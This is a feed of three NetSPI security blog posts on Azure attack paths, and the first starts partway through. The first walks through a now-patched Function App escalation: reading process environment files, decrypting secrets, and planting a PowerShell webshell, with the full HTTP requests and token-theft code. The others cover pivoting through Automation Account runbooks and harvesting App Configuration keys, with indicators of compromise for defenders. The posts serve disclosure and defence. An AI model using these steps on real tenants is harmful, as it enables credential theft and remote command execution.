mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .TempFile.txt 

gc .TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.
ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the Tag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/
run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 
'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=
whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=
$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get 
-Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} 
-Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
Pivoting with Azure Automation Account Connections https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-automation-account-connections/ Thu, 16 Feb 2023 15:00:00 +0000 https://www.netspi.com/azure-automation-account-connections/ Discover a helpful function for enumerating potential pivot points from an existing Azure Automation Account with Contributor level access.

The post Pivoting with Azure Automation Account Connections appeared first on NetSPI.

]]>
Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We’re always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
    • For each selected subscription 
      • Get a list of available connections (Run As or Managed Identity) 
      • Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults 
      • Upload and run the runbook 
      • Retrieve the output and return it
      • Delete the runbook 

In general, we are going to create a “malicious” automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it’s rare for us to see a cross-tenant connection like that.

As a final note on the script, the “Classic Run As” connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we’ve opted to avoid adding the logic in for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
    a.   User/App Registration authenticates via the Az PowerShell cmdlets 
  1. Subscriptions / Automation Accounts Enumerated 
    a.   The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  1. Malicious Runbook draft is created in the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/write
    b.   Microsoft.Automation/automationAccounts/runbooks/draft/write 
  1. Malicious Runbook is published to the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/publish/action 
  1. Malicious Runbook is executed as a job
    a.   Microsoft.Automation/automationAccounts/jobs/write 
  1. Run As connections and/or Managed Identities should show up as authentication events 
  1. Malicious Runbook is deleted from the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/delete 

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I previously outlined in a previous article titled, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or checkout these blog posts for more in-depth research on Azure Automation Accounts:  

The post Pivoting with Azure Automation Account Connections appeared first on NetSPI.

]]>
How to Gather Azure App Configurations https://www.netspi.com/blog/technical-blog/cloud-pentesting/gathering-azure-app-configurations/ Thu, 08 Dec 2022 16:00:00 +0000 https://www.netspi.com/gathering-azure-app-configurations/ Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs.

The post How to Gather Azure App Configurations appeared first on NetSPI.

]]>
Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an ap configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log – List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – < UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

The post How to Gather Azure App Configurations appeared first on NetSPI.

]]>